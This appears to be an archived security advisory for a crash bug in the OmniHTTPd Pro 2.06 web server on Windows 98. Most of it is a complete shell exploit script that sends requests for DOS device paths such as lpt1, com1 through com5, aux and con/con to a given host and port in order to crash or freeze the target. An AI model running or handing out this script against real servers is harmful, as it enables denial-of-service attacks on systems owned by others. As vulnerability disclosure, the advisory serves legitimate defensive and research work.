COMMAND

    Omni httpd

SYSTEMS AFFECTED

    Omni Httpd pro v.2.06 Win98 (NT not tested)

PROBLEM

    Here  is  the  exploit  code  to crash/freeze OmniHttpD Pro v2.06,
    in-depth information  on this  particular bug  can be  found in  a
    securax advisory.

    #!/bin/sh
    #
    # Vulnerable versions:
    #     Omni Httpd pro v.2.06 Win98 (NT not tested)
    #
    # The problem:
    #     It is possible to crash remote system because OmniHttpD
    (version: Pro. v2.06, maybe others) parse the
    # path strings to call some FAT32/VFAT routines in the kernel which
    makes your system unstable and useless until next reboot.
    #
    # Fix:
    #     Unknown for now, I mailed Omnicron Technologies ... they will
    probably fix this bug
    #     in next version.
    #
    # About:
    #     Discovered by: sirius from b0f
    #     Coded by: sirius from buffer0vefl0w security (b0f)
    #     [http://b0f.freebsd.lublin.pl]
    
    if [ "$1" = "" ]; then
	    echo "OmniHTTPd v.2.06 DoS attack"
	    echo
	    echo "Coded: sirius from buffer0vefl0w security (b0f)"
	    echo "[http://b0f.freebsd.lublin.pl]"
	    echo
	    echo "Usage: $0 <host> <port>" echo exit 1 fi
    
    echo "Launching attack ... please wait "
    
    # this will crash some devices, but if modem is on comX the code after
    line with comX will not
    # be executed ... you can change the order of execution ;)
    
    (echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    
    # the following code will crash/freeze/make system busy/how to call
    it? system
    
    (echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
    (echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null
    
    echo "Crash code send ..."
    killall -9 telnet 2>/dev/null 1> /dev/null
    echo "Done!"

SOLUTION

    Should be fixed.